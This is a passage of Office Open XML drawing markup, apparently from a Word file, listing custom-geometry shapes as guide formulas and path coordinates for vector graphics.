                                  <a:gd name="T85" fmla="*/ 9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25" h="493">
                                    <a:moveTo>
                                      <a:pt x="1225" y="9"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="1210" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1153" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="610" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="605" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="600" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="465" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="403" y="147"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="341" y="151"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="279" y="164"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="222" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="171" y="212"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="234"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="104" y="281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="312"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="338"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="368"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="433"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="493"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="493"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="489"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="455"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="424"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="394"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="359"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="299"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="242"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="208"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="182"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="197" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="243" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="290" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="341" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="393" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="445" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="502" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="558" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="564" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="569" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="574" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1210" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="1225"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90"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7426" y="2971"/>
                                <a:ext cx="37" cy="142"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 11 w 37"/>
                                  <a:gd name="T1" fmla="*/ 34 h 142"/>
                                  <a:gd name="T2" fmla="*/ 6 w 37"/>
                                  <a:gd name="T3" fmla="*/ 64 h 142"/>
                                  <a:gd name="T4" fmla="*/ 16 w 37"/>
                                  <a:gd name="T5" fmla="*/ 86 h 142"/>
                                  <a:gd name="T6" fmla="*/ 21 w 37"/>
                                  <a:gd name="T7" fmla="*/ 112 h 142"/>
                                  <a:gd name="T8" fmla="*/ 37 w 37"/>
                                  <a:gd name="T9" fmla="*/ 138 h 142"/>
                                  <a:gd name="T10" fmla="*/ 31 w 37"/>
                                  <a:gd name="T11" fmla="*/ 142 h 142"/>
                                  <a:gd name="T12" fmla="*/ 11 w 37"/>
                                  <a:gd name="T13" fmla="*/ 112 h 142"/>
                                  <a:gd name="T14" fmla="*/ 0 w 37"/>
                                  <a:gd name="T15" fmla="*/ 82 h 142"/>
                                  <a:gd name="T16" fmla="*/ 0 w 37"/>
                                  <a:gd name="T17" fmla="*/ 47 h 142"/>
                                  <a:gd name="T18" fmla="*/ 6 w 37"/>
                                  <a:gd name="T19" fmla="*/ 12 h 142"/>
                                  <a:gd name="T20" fmla="*/ 16 w 37"/>
                                  <a:gd name="T21" fmla="*/ 0 h 142"/>
                                  <a:gd name="T22" fmla="*/ 16 w 37"/>
                                  <a:gd name="T23" fmla="*/ 8 h 142"/>
                                  <a:gd name="T24" fmla="*/ 16 w 37"/>
                                  <a:gd name="T25" fmla="*/ 17 h 142"/>
                                  <a:gd name="T26" fmla="*/ 11 w 37"/>
                                  <a:gd name="T27" fmla="*/ 34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 h="142">
                                    <a:moveTo>
                                      <a:pt x="11" y="34"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="64"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="37" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="142"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="6" y="12"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11"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91"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7623" y="2975"/>
                                <a:ext cx="315" cy="255"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 93 w 315"/>
                                  <a:gd name="T1" fmla="*/ 26 h 255"/>
                                  <a:gd name="T2" fmla="*/ 77 w 315"/>
                                  <a:gd name="T3" fmla="*/ 30 h 255"/>
                                  <a:gd name="T4" fmla="*/ 77 w 315"/>
                                  <a:gd name="T5" fmla="*/ 39 h 255"/>
                                  <a:gd name="T6" fmla="*/ 129 w 315"/>
                                  <a:gd name="T7" fmla="*/ 78 h 255"/>
                                  <a:gd name="T8" fmla="*/ 124 w 315"/>
                                  <a:gd name="T9" fmla="*/ 91 h 255"/>
                                  <a:gd name="T10" fmla="*/ 93 w 315"/>
                                  <a:gd name="T11" fmla="*/ 95 h 255"/>
                                  <a:gd name="T12" fmla="*/ 51 w 315"/>
                                  <a:gd name="T13" fmla="*/ 60 h 255"/>
                                  <a:gd name="T14" fmla="*/ 41 w 315"/>
                                  <a:gd name="T15" fmla="*/ 69 h 255"/>
                                  <a:gd name="T16" fmla="*/ 77 w 315"/>
                                  <a:gd name="T17" fmla="*/ 121 h 255"/>
                                  <a:gd name="T18" fmla="*/ 124 w 315"/>
                                  <a:gd name="T19" fmla="*/ 125 h 255"/>
                                  <a:gd name="T20" fmla="*/ 155 w 315"/>
                                  <a:gd name="T21" fmla="*/ 112 h 255"/>
                                  <a:gd name="T22" fmla="*/ 160 w 315"/>
                                  <a:gd name="T23" fmla="*/ 82 h 255"/>
                                  <a:gd name="T24" fmla="*/ 108 w 315"/>
                                  <a:gd name="T25" fmla="*/ 30 h 255"/>
                                  <a:gd name="T26" fmla="*/ 145 w 315"/>
                                  <a:gd name="T27" fmla="*/ 56 h 255"/>
                                  <a:gd name="T28" fmla="*/ 170 w 315"/>
                                  <a:gd name="T29" fmla="*/ 91 h 255"/>
                                  <a:gd name="T30" fmla="*/ 170 w 315"/>
                                  <a:gd name="T31" fmla="*/ 112 h 255"/>
                                  <a:gd name="T32" fmla="*/ 181 w 315"/>
                                  <a:gd name="T33" fmla="*/ 125 h 255"/>
                                  <a:gd name="T34" fmla="*/ 217 w 315"/>
                                  <a:gd name="T35" fmla="*/ 112 h 255"/>
                                  <a:gd name="T36" fmla="*/ 243 w 315"/>
                                  <a:gd name="T37" fmla="*/ 121 h 255"/>
                                  <a:gd name="T38" fmla="*/ 274 w 315"/>
                                  <a:gd name="T39" fmla="*/ 160 h 255"/>
                                  <a:gd name="T40" fmla="*/ 294 w 315"/>
                                  <a:gd name="T41" fmla="*/ 216 h 255"/>
                                  <a:gd name="T42" fmla="*/ 248 w 315"/>
                                  <a:gd name="T43" fmla="*/ 225 h 255"/>
                                  <a:gd name="T44" fmla="*/ 155 w 315"/>
                                  <a:gd name="T45" fmla="*/ 195 h 255"/>
                                  <a:gd name="T46" fmla="*/ 145 w 315"/>
                                  <a:gd name="T47" fmla="*/ 177 h 255"/>
                                  <a:gd name="T48" fmla="*/ 155 w 315"/>
                                  <a:gd name="T49" fmla="*/ 156 h 255"/>
                                  <a:gd name="T50" fmla="*/ 155 w 315"/>
                                  <a:gd name="T51" fmla="*/ 143 h 255"/>
                                  <a:gd name="T52" fmla="*/ 134 w 315"/>
                                  <a:gd name="T53" fmla="*/ 143 h 255"/>
                                  <a:gd name="T54" fmla="*/ 98 w 315"/>
                                  <a:gd name="T55" fmla="*/ 134 h 255"/>
                                  <a:gd name="T56" fmla="*/ 36 w 315"/>
                                  <a:gd name="T57" fmla="*/ 78 h 255"/>
                                  <a:gd name="T58" fmla="*/ 0 w 315"/>
                                  <a:gd name="T59" fmla="*/ 4 h 255"/>
                                  <a:gd name="T60" fmla="*/ 57 w 315"/>
                                  <a:gd name="T61" fmla="*/ 13 h 255"/>
                                  <a:gd name="T62" fmla="*/ 103 w 315"/>
                                  <a:gd name="T63" fmla="*/ 3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5" h="255">
                                    <a:moveTo>
                                      <a:pt x="103" y="30"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="113" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="86"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="51" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="170" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="181" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="201" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="217" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="227" y="112"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="243" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="258" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="274" y="160"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="279" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="294" y="216"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="315" y="255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="248" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="176" y="203"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="195"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="177"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="164"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="147"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="138"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="3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92"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="9515" y="2971"/>
                                <a:ext cx="25" cy="25"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 25 w 25"/>
                                  <a:gd name="T1" fmla="*/ 8 h 25"/>
                                  <a:gd name="T2" fmla="*/ 20 w 25"/>
                                  <a:gd name="T3" fmla="*/ 17 h 25"/>
                                  <a:gd name="T4" fmla="*/ 10 w 25"/>
                                  <a:gd name="T5" fmla="*/ 25 h 25"/>
                                  <a:gd name="T6" fmla="*/ 0 w 25"/>
                                  <a:gd name="T7" fmla="*/ 21 h 25"/>
                                  <a:gd name="T8" fmla="*/ 0 w 25"/>
                                  <a:gd name="T9" fmla="*/ 17 h 25"/>
                                  <a:gd name="T10" fmla="*/ 0 w 25"/>
                                  <a:gd name="T11" fmla="*/ 8 h 25"/>
                                  <a:gd name="T12" fmla="*/ 10 w 25"/>
                                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                                  <a:gd name="T14" fmla="*/ 20 w 25"/>
                                  <a:gd name="T15" fmla="*/ 4 h 25"/>
                                  <a:gd name="T16" fmla="*/ 25 w 25"/>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25">
                                    <a:moveTo>
                                      <a:pt x="25" y="8"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="25"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25"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93"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8972" y="2996"/>
                                <a:ext cx="72" cy="100"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 67 w 72"/>
                                  <a:gd name="T1" fmla="*/ 18 h 100"/>
                                  <a:gd name="T2" fmla="*/ 46 w 72"/>
                                  <a:gd name="T3" fmla="*/ 39 h 100"/>
                                  <a:gd name="T4" fmla="*/ 36 w 72"/>
                                  <a:gd name="T5" fmla="*/ 44 h 100"/>
                                  <a:gd name="T6" fmla="*/ 15 w 72"/>
                                  <a:gd name="T7" fmla="*/ 44 h 100"/>
                                  <a:gd name="T8" fmla="*/ 15 w 72"/>
                                  <a:gd name="T9" fmla="*/ 52 h 100"/>
                                  <a:gd name="T10" fmla="*/ 21 w 72"/>
                                  <a:gd name="T11" fmla="*/ 52 h 100"/>
                                  <a:gd name="T12" fmla="*/ 52 w 72"/>
                                  <a:gd name="T13" fmla="*/ 70 h 100"/>
                                  <a:gd name="T14" fmla="*/ 62 w 72"/>
                                  <a:gd name="T15" fmla="*/ 83 h 100"/>
                                  <a:gd name="T16" fmla="*/ 67 w 72"/>
                                  <a:gd name="T17" fmla="*/ 96 h 100"/>
                                  <a:gd name="T18" fmla="*/ 67 w 72"/>
                                  <a:gd name="T19" fmla="*/ 100 h 100"/>
                                  <a:gd name="T20" fmla="*/ 10 w 72"/>
                                  <a:gd name="T21" fmla="*/ 74 h 100"/>
                                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                                  <a:gd name="T23" fmla="*/ 65 h 100"/>
                                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                                  <a:gd name="T25" fmla="*/ 61 h 100"/>
                                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                                  <a:gd name="T27" fmla="*/ 44 h 100"/>
                                  <a:gd name="T28" fmla="*/ 15 w 72"/>
                                  <a:gd name="T29" fmla="*/ 31 h 100"/>
                                  <a:gd name="T30" fmla="*/ 31 w 72"/>
                                  <a:gd name="T31" fmla="*/ 22 h 100"/>
                                  <a:gd name="T32" fmla="*/ 52 w 72"/>
                                  <a:gd name="T33" fmla="*/ 13 h 100"/>
                                  <a:gd name="T34" fmla="*/ 62 w 72"/>
                                  <a:gd name="T35" fmla="*/ 0 h 100"/>
                                  <a:gd name="T36" fmla="*/ 72 w 72"/>
                                  <a:gd name="T37" fmla="*/ 9 h 100"/>
                                  <a:gd name="T38" fmla="*/ 67 w 72"/>
                                  <a:gd name="T39"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00">
                                    <a:moveTo>
                                      <a:pt x="67" y="18"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="83"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="96"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="1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94"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7468" y="3001"/>
                                <a:ext cx="31" cy="26"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 31 w 31"/>
                                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                                  <a:gd name="T2" fmla="*/ 26 w 31"/>
                                  <a:gd name="T3" fmla="*/ 26 h 26"/>
                                  <a:gd name="T4" fmla="*/ 20 w 31"/>
                                  <a:gd name="T5" fmla="*/ 21 h 26"/>
                                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                                  <a:gd name="T7" fmla="*/ 8 h 26"/>
                                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                                  <a:gd name="T9" fmla="*/ 0 h 26"/>
                                  <a:gd name="T10" fmla="*/ 31 w 31"/>
                                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                                </a:gdLst>
                                <a:ahLst/>
                                <a:cxnLst>
                                  <a:cxn ang="0">
                                    <a:pos x="T0" y="T1"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T2" y="T3"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T4" y="T5"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T6" y="T7"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T8" y="T9"/>
                                  </a:cxn>
                                  <a:cxn ang="0">
                                    <a:pos x="T10" y="T11"/>
                                  </a:cxn>
                                </a:cxnLst>
                                <a:rect l="0" t="0" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="31" h="26">
                                    <a:moveTo>
                                      <a:pt x="31" y="26"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="26"/>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95"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8341" y="3001"/>
                                <a:ext cx="78" cy="65"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 73 w 78"/>
                                  <a:gd name="T1" fmla="*/ 65 h 65"/>
                                  <a:gd name="T2" fmla="*/ 57 w 78"/>
                                  <a:gd name="T3" fmla="*/ 65 h 65"/>
                                  <a:gd name="T4" fmla="*/ 47 w 78"/>
                                  <a:gd name="T5" fmla="*/ 60 h 65"/>
                                  <a:gd name="T6" fmla="*/ 26 w 78"/>
                                  <a:gd name="T7" fmla="*/ 52 h 65"/>
                                  <a:gd name="T8" fmla="*/ 11 w 78"/>
                                  <a:gd name="T9" fmla="*/ 26 h 65"/>
                                  <a:gd name="T10" fmla="*/ 0 w 78"/>
                                  <a:gd name="T11" fmla="*/ 0 h 65"/>
                                  <a:gd name="T12" fmla="*/ 26 w 78"/>
                                  <a:gd name="T13" fmla="*/ 17 h 65"/>
                                  <a:gd name="T14" fmla="*/ 52 w 78"/>
                                  <a:gd name="T15" fmla="*/ 26 h 65"/>
                                  <a:gd name="T16" fmla="*/ 62 w 78"/>
                                  <a:gd name="T17" fmla="*/ 34 h 65"/>
                                  <a:gd name="T18" fmla="*/ 73 w 78"/>
                                  <a:gd name="T19" fmla="*/ 39 h 65"/>
                                  <a:gd name="T20" fmla="*/ 78 w 78"/>
                                  <a:gd name="T21" fmla="*/ 52 h 65"/>
                                  <a:gd name="T22" fmla="*/ 73 w 78"/>
                                  <a:gd name="T23"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8" h="65">
                                    <a:moveTo>
                                      <a:pt x="73" y="65"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="65"/>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96"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8119" y="3005"/>
                                <a:ext cx="57" cy="95"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                                  <a:gd name="T1" fmla="*/ 13 h 95"/>
                                  <a:gd name="T2" fmla="*/ 57 w 57"/>
                                  <a:gd name="T3" fmla="*/ 22 h 95"/>
                                  <a:gd name="T4" fmla="*/ 47 w 57"/>
                                  <a:gd name="T5" fmla="*/ 26 h 95"/>
                                  <a:gd name="T6" fmla="*/ 36 w 57"/>
                                  <a:gd name="T7" fmla="*/ 30 h 95"/>
                                  <a:gd name="T8" fmla="*/ 31 w 57"/>
                                  <a:gd name="T9" fmla="*/ 39 h 95"/>
                                  <a:gd name="T10" fmla="*/ 21 w 57"/>
                                  <a:gd name="T11" fmla="*/ 56 h 95"/>
                                  <a:gd name="T12" fmla="*/ 21 w 57"/>
                                  <a:gd name="T13" fmla="*/ 69 h 95"/>
                                  <a:gd name="T14" fmla="*/ 26 w 57"/>
                                  <a:gd name="T15" fmla="*/ 82 h 95"/>
                                  <a:gd name="T16" fmla="*/ 36 w 57"/>
                                  <a:gd name="T17" fmla="*/ 87 h 95"/>
                                  <a:gd name="T18" fmla="*/ 36 w 57"/>
                                  <a:gd name="T19" fmla="*/ 91 h 95"/>
                                  <a:gd name="T20" fmla="*/ 21 w 57"/>
                                  <a:gd name="T21" fmla="*/ 95 h 95"/>
                                  <a:gd name="T22" fmla="*/ 10 w 57"/>
                                  <a:gd name="T23" fmla="*/ 91 h 95"/>
                                  <a:gd name="T24" fmla="*/ 5 w 57"/>
                                  <a:gd name="T25" fmla="*/ 69 h 95"/>
                                  <a:gd name="T26" fmla="*/ 0 w 57"/>
